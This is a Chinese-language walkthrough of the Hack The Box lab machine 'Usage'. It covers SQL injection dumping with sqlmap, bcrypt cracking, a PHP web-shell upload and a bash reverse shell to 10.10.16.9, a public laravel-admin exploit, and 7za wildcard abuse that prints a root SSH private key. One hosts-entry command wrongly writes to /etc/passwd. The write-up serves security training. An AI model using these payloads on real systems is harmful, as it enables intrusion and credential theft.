HTB Usage writeup(基础打牢,“地动山摇”)
·
HTB Usage writeup
大佬请忽略!
Usage攻击要点:
★ SQL注入
★ PHP文件上传绕过
★ 密码复用
★ sudo提权
★ 7za通配符滥用。7za也会任意文件读取
信息收集
nmap
└─$ nmap -p- --min-rate 1000 10.10.11.18
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-26 15:03 CST
Nmap scan report for 10.10.11.18
Host is up (0.23s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 83.27 seconds
└─$ nmap -p22,80 -sCV --min-rate 1000 10.10.11.18
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-26 15:05 CST
Nmap scan report for 10.10.11.18
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
|_ 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.66 seconds
靶机开放ssh服务的22端口,HTTP服务的80端口和域名usage.htb。
http
维护usage.htb到文件/etc/passwd。
echo 10.10.11.18 usage.htb | tee -a /etc/passwd
http://usage.htb/
web服务有登录、注册、密码重置功能,发现子域名admin.usage.htb维护到/etc/hosts。
10.10.11.18 usage.htb admin.usage.htb
http://admin.usage.htb/
ffuf
└─$ ffuf -u http://usage.htb/ -H "Host: FUZZ.usage.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 -fs 178
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://usage.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.usage.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 178
________________________________________________
admin [Status: 200, Size: 3304, Words: 493, Lines: 89, Duration: 752ms]
:: Progress: [114442/114442] :: Job [1/1] :: 586 req/sec :: Duration: [0:09:18] :: Errors: 0 ::
没有收集到其他域名信息。
Shell as dash
注册一个测试账号test@test.com/test,测试密码重置。密码重置的逻辑是这样的,输入邮箱点击重置会发请求重置密码并且重定向到当前页面,然后页面会自动发起另一个一个查询请求,请求密码重置的结果。
使用单引号测试存在SQL注入漏洞。
sqlmap
使用sqlmap脱库
└─$ sqlmap -l req.log --thread 10 --level 5 --risk 3 --batch -p email -D usage_blog -T users,admin_users --dump
___
__H__
___ ___[)]_____ ___ ___ {1.9.6#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:52:33 /2025-09-28/
[15:52:33] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://usage.htb:80/forget-password
Cookie: XSRF-TOKEN=eyJpdiI6InJUQlE0Ry8raXR1ZlMrRXh6N1JVeHc9PSIsInZhbHVlIjoiNDlrRWlCeHYvTXZVTUhDK01jMVQrcXVQdExUUUZSbjFrRjBvNHk4T0VJdlE1ZmRBM1JUVnZGNFpuengrM1BRVlB1cllaTHVZRVdFVjBxbXpyeGtob2MyNEFaMDlVUllySVBSb2doei9wZ3dDZDhxcUxHQkN5M21SS2pVUENVMDAiLCJtYWMiOiI0NGVhMzNmYTc2MDM4MjVlYjc1ODk5OTcyZjMxYWEwNjZlNDBjODk3MGU5ZTJhMzc4MTA3YjNlMTIzNGRjNmUzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5GNEl1WDAwUGsvL3NWUmpzUGFiM0E9PSIsInZhbHVlIjoiUTZIbjNsTEh4QmQwUFNtOW5pVWU3VkRWWDhvNDNkUGNlRCsxS3dhOUhqYVNtVC9XMDdjZUxkWTNBQkFUVWhaRkJNVFhXN2xNUk1qU0dCRkVNR2tSMTFqUlJ4dVhQOEpWcmJnRFh6dHV3ajNHdDA3bXVLSEpZZFV5UGVIMWI1elQiLCJtYWMiOiJjYjc3ZGNkYTNlMmZkMzNlNjllYzJiZWNjNmM0ZGE3NWIxOTRlODkzNDNjOTZlMTQ4YmVjNzA0NDRkNjNkMzMwIiwidGFnIjoiIn0%3D
POST data: _token=jnajHr3kIAkGdKZFf07ZwziqvFuYM4K6gdk7ApQM&email=test%40test.com
do you want to test this URL? [Y/n/q]
> Y
[15:52:33] [INFO] testing URL 'http://usage.htb:80/forget-password'
[15:52:33] [INFO] resuming back-end DBMS 'mysql'
[15:52:33] [INFO] using '/home/VexCjfkNgNW5/.local/share/sqlmap/output/results-09282025_0352pm.csv' as the CSV results file in multiple targets mode
[15:52:33] [INFO] testing connection to the target URL
[15:52:34] [WARNING] the web server responded with an HTTP error code (419) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: _token=psMWZB6IBhYXkVqkF362Ex4TujpYJhMN7Yo6JbZO&email=test@test.com' AND 3675=(SELECT (CASE WHEN (3675=3675) THEN 3675 ELSE (SELECT 8020 UNION SELECT 4074) END))-- Pagk
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: _token=psMWZB6IBhYXkVqkF362Ex4TujpYJhMN7Yo6JbZO&email=test@test.com' AND 3326=BENCHMARK(5000000,MD5(0x706a4f5a))-- ZOoY
---
do you want to exploit this SQL injection? [Y/n] Y
[15:52:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0, Laravel (PHP)
back-end DBMS: MySQL < 5.0.12
...[snip]...
Database: usage_blog
Table: users
[3 entries]
+----+---------------+--------+--------------------------------------------------------------+---------------------+---------------------+----------------+-------------------+
| id | email | name | password | created_at | updated_at | remember_token | email_verified_at |
+----+---------------+--------+--------------------------------------------------------------+---------------------+---------------------+----------------+-------------------+
| 1 | raj@raj.com | raj | $2y$10$7ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4. | 2023-08-17 03:16:02 | 2023-08-17 03:16:02 | NULL | NULL |
| 2 | raj@usage.htb | raj | $2y$10$rbNCGxpWp1HSpO1gQX4uPO.pDg1nszoI/UhwHvfHDdfdfo9VmDJsa | 2023-08-22 08:55:16 | 2023-08-22 08:55:16 | NULL | NULL |
| 3 | test@test.com | test | $2y$10$ENKq5zVIrk3lVqeJsxIwq.E | 2025-06-23 07:11:03 | 2025-09-26 06:53:37 | NULL | NULL |
+----+---------------+--------+--------------------------------------------------------------+---------------------+---------------------+----------------+-------------------+
[15:52:53] [INFO] table 'usage_blog.users' dumped to CSV file '/home/VexCjfkNgNW5/.local/share/sqlmap/output/usage.htb/dump/usage_blog/users.csv'
...[snip]...
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[15:52:53] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[15:53:12] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[15:53:13] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[15:53:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
...[snip]...
Database: usage_blog
Table: admin_users
[1 entry]
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+-----------------------------------+
| id | name | avatar | password | username | created_at | updated_at | remember_token |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+-----------------------------------+
| 1 | Administrator | <blank> | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 | admin | 2023-08-13 02:48:26 | 2023-08-23 06:02:19 | kThXIKu7GhLpgwStz7fCFxjDomCYS1SmP |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+-----------------------------------+
[15:53:16] [INFO] table 'usage_blog.admin_users' dumped to CSV file '/home/VexCjfkNgNW5/.local/share/sqlmap/output/usage.htb/dump/usage_blog/admin_users.csv'
[15:53:16] [WARNING] HTTP error codes detected during run:
419 (?) - 58 times
[15:53:16] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/VexCjfkNgNW5/.local/share/sqlmap/output/results-09282025_0352pm.csv'
[*] ending @ 15:53:16 /2025-09-28/
hashcat
使用hashcat爆破密码
└─$ cat hash
$2y$10$7ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4.
$2y$10$rbNCGxpWp1HSpO1gQX4uPO.pDg1nszoI/UhwHvfHDdfdfo9VmDJsa
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2
识别加密类型。
└─$ hashcat --identify hash
The following 4 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
破解
└─# hashcat -a 0 -m 3200 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz, 2189/4442 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
Cracking performance lower than expected?
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2:whatever1
$2y$10$rbNCGxpWp1HSpO1gQX4uPO.pDg1nszoI/UhwHvfHDdfdfo9VmDJsa:xander
$2y$10$7ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4.:xander
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: hash
Time.Started.....: Sun Sep 28 16:21:58 2025 (1 min, 32 secs)
Time.Estimated...: Sun Sep 28 16:23:30 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 65 H/s (3.65ms) @ Accel:4 Loops:16 Thr:1 Vec:1
Recovered........: 3/3 (100.00%) Digests (total), 3/3 (100.00%) Digests (new), 3/3 (100.00%) Salts
Progress.........: 6528/43033152 (0.02%)
Rejected.........: 0/6528 (0.00%)
Restore.Point....: 2160/14344384 (0.02%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: monalisa -> telefon
Hardware.Mon.#1..: Util: 89%
Started: Sun Sep 28 16:21:53 2025
Stopped: Sun Sep 28 16:23:32 2025
从数据库中获取的用户名和密码有raj@raj.com/xander,raj@usage.htb/xander和admin/whatever1。使用admin/whatever1登录http://admin.usage.htb网站成功。
应用程序框架利用laravel-admin 1.8.17 exploit
manual
laravel-admin 1.8.17 RCE
准备一句话木马
<?php System($_GET['cmd']);?>
使用burp suite拦截正常的图片上传,修改图片的后缀名为.php,图片内容为一句话木马。
bash -c 'bash -i >& /dev/tcp/10.10.16.9/9000 0>&1'
URL编码
%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%36%2e%39%2f%39%30%30%30%20%30%3e%26%31%27
nc -lvnp 9000
...[snip]...
dash@usage:/var/www/html/project_admin/public/uploads/images$ id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
升级全交互式shell
dash@usage:/var/www/html/project_admin/public/uploads/images$ script /dev/null -c bash
<min/public/uploads/images$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
dash@usage:/var/www/html/project_admin/public/uploads/images$ ^Z
zsh: suspended nc -lvnp 9000
└─$ stty raw -echo;fg
[1] + continued nc -lvnp 9000
reset
reset: unknown terminal type unknown
Terminal type? screen
<oject_admin/public/uploads/images$ stty rows 29 columns 117
dash@usage:/var/www/html/project_admin/public/uploads/images$ id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
script
└─$ git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
Cloning into 'CVE-2023-24249-Exploit'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 9 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (9/9), 5.92 KiB | 2.96 MiB/s, done.
Resolving deltas: 100% (1/1), done.
└─$ cd CVE-2023-24249-Exploit
└─$ python exploit.py -u http://admin.usage.htb -U admin -P whatever1 -i 10.10.16.9 -p 9001
/home/VexCjfkNgNW5/hackthebox/ippsec/Usage/CVE-2023-24249-Exploit/exploit.py:8: SyntaxWarning: invalid escape sequence '\ '
/ __\ \ / / __|_|_ ) \_ )__ /__|_ ) | |_ ) | |/ _ \\
_____ _____ ___ __ ___ ____ ___ _ _ ___ _ _ ___
/ __\ \ / / __|_|_ ) \_ )__ /__|_ ) | |_ ) | |/ _ \
| (__ \ V /| _|___/ / () / / |_ \___/ /|_ _/ /|_ _\_, /
\___| \_/ |___| /___\__/___|___/ /___| |_/___| |_| /_/ EXPLOIT by IDUZZEL
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at 10.10.16.9:9001
shell
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.11.18] 50058
bash: cannot set terminal process group (1223): Inappropriate ioctl for device
bash: no job control in this shell
dash@usage:/var/www/html/project_admin/public/uploads/images$ id
id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
dash@usage:/var/www/html/project_admin/public/uploads/images$
Shell as xander
服务器端用户
dash@usage:/var/www/html/project_admin/public/uploads/images$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
dash:x:1000:1000:dash:/home/dash:/bin/bash
xander:x:1001:1001::/home/xander:/bin/bash
home目录信息
dash@usage:~$ ls -la
total 52
drwxr-x--- 6 dash dash 4096 Sep 29 00:09 .
drwxr-xr-x 4 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Apr 2 2024 .bash_history -> /dev/null
-rw-r--r-- 1 dash dash 3771 Jan 6 2022 .bashrc
drwx------ 3 dash dash 4096 Aug 7 2023 .cache
drwxrwxr-x 4 dash dash 4096 Aug 20 2023 .config
drwxrwxr-x 3 dash dash 4096 Aug 7 2023 .local
-rw-r--r-- 1 dash dash 32 Oct 26 2023 .monit.id
-rw-r--r-- 1 dash dash 6 Sep 29 00:09 .monit.pid
-rw------- 1 dash dash 1192 Sep 29 00:09 .monit.state
-rwx------ 1 dash dash 707 Oct 26 2023 .monitrc
-rw-r--r-- 1 dash dash 807 Jan 6 2022 .profile
drwx------ 2 dash dash 4096 Aug 24 2023 .ssh
-rw-r----- 1 root dash 33 Sep 28 08:36 user.txt
发现了一些有趣的文件:.monit.id、.monit.pid、.monit.state 和 .monitrc。
这些文件(.monit.id、.monit.pid、.monit.state 和 .monitrc)都与 Monit(一个开源的进程监控工具)相关。Monit 用于监控 Unix-like 系统上的服务(如进程、文件、目录等),自动检测故障并执行动作(如重启服务)。这些文件通常出现在 Monit 的工作目录或用户主目录(如 ~)中。
.monitrc
Monit 的主配置文件(control file),通常是一个纯文本文件,包含 Monit 的全局设置和服务监控规则。
.monit.pid
Monit 自身的进程 ID(PID)锁文件,通常是一个小文本文件,存储 Monit 守护进程的进程 ID。
.monit.state
Monit 的状态文件,一个二进制或文本文件,用于持久化存储 Monit 的运行状态。
.monit.id
Monit 的唯一 ID 文件,一个小文本文件,存储 Monit 实例的唯一标识符。
dash@usage:~$ cat .monitrc
#Monitoring Interval in Seconds
set daemon 60
#Enable Web Access
set httpd port 2812
use address 127.0.0.1
allow admin:3nc0d3d_pa$$w0rd
...[snip]...
使用密码3nc0d3d_pa$$w0rd登录xander。
└─$ ssh xander@10.10.11.18
xander@10.10.11.18's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
...[snip]...
xander@usage:~$ id
uid=1001(xander) gid=1001(xander) groups=1001(xander)
Shell as root
sudo -l
通过配置 /etc/sudoers,允许普通用户以超级用户(或其他用户)身份执行特定命令,利用 sudo 临时切换权限运行。
xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User xander may run the following commands on usage:
(ALL : ALL) NOPASSWD: /usr/bin/usage_management
这是一个Linux可执行文件。
xander@usage:~$ file /usr/bin/usage_management
/usr/bin/usage_management: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=fdb8c912d98c85eb5970211443440a15d910ce7f, for GNU/Linux 3.2.0, not stripped
生成md5哈希值
xander@usage:~$ md5sum /usr/bin/usage_management
f3c1b2b1ccacc24cc7ed8f3ad62bb7c6 /usr/bin/usage_management
在VirusTotal没找到说明这个文件没提交。
xander@usage:~$ strings /usr/bin/usage_management
/lib64/ld-linux-x86-64.so.2
...[snip]...
/var/www/html
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
Error changing working directory to /var/www/html
/usr/bin/mysqldump -A > /var/backups/mysql_backup.sql
Password has been reset.
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3):
Invalid choice.
:*3$"
GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0
...[snip]...
xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7313P 16-Core Processor (A00F11),ASM,AES-NI)
Scanning the drive:
2984 folders, 17972 files, 114778695 bytes (110 MiB)
Creating archive: /var/backups/project.zip
Items to compress: 20956
Files read from disk: 17972
Archive size: 54871391 bytes (53 MiB)
Everything is Ok
通过分析发现:执行sudo /usr/bin/usage_management并输入1,会切换到/var/www/html目录,调用7za压缩目录中的所有文件到/var/backups/project.zip压缩包。
7za 是 7-Zip 的命令行版本,一个开源的压缩解压工具,支持多种压缩格式(如 7z、ZIP、TAR)。它通过高效的压缩算法(如 LZMA)减少文件大小,原理是将数据重组和编码以去除冗余。作用包括压缩文件以节省存储空间、加密数据以保护隐私、分割大文件以便传输。主要用于脚本自动化和无图形界面的环境。
exploit
进入/var/www/html文件夹,创建指向/root/.ssh/id_rsa文件的软连接test,并创建@test文件。执行sudo /usr/bin/usage_management并输入1,控制台就会打印/root/.ssh/id_rsa文件内容。
xander@usage:/var/www/html$ ln -s /root/.ssh/id_rsa test
xander@usage:/var/www/html$ touch @test
xander@usage:/var/www/html$ ls -la
total 16
drwxrwxrwx 4 root xander 4096 Sep 29 01:00 .
drwxr-xr-x 3 root root 4096 Apr 2 2024 ..
drwxrwxr-x 13 dash dash 4096 Apr 2 2024 project_admin
-rw-rw-r-- 1 xander xander 0 Sep 29 01:00 @test
lrwxrwxrwx 1 xander xander 17 Sep 29 01:00 test -> /root/.ssh/id_rsa
drwxrwxr-x 12 dash dash 4096 Apr 2 2024 usage_blog
将私钥保存到kali的文件id_rsa。
xander@usage:/var/www/html$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7313P 16-Core Processor (A00F11),ASM,AES-NI)
Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54871391
Scanning the drive:
WARNING: No more files
-----BEGIN OPENSSH PRIVATE KEY-----
WARNING: No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
WARNING: No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi
WARNING: No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q
WARNING: No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs
WARNING: No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM=
WARNING: No more files
-----END OPENSSH PRIVATE KEY-----
2984 folders, 17973 files, 114779094 bytes (110 MiB)
Updating archive: /var/backups/project.zip
Items to compress: 20957
Files read from disk: 17973
Archive size: 54871528 bytes (53 MiB)
Scan WARNINGS for files and folders:
-----BEGIN OPENSSH PRIVATE KEY----- : No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW : No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi : No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q : No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs : No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM= : No more files
-----END OPENSSH PRIVATE KEY----- : No more files
----------------
Scan WARNINGS: 7
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM=
-----END OPENSSH PRIVATE KEY-----
ssh root登录
chmod 600 id_rsa
└─$ ssh root@10.10.11.18 -i id_rsa
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
...[snip]...
Last login: Mon Apr 8 13:17:47 2024 from 10.10.14.40
root@usage:~# id
uid=0(root) gid=0(root) groups=0(root)
腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。
更多推荐
13
0- 0
已为社区贡献10条内容
所有评论(0)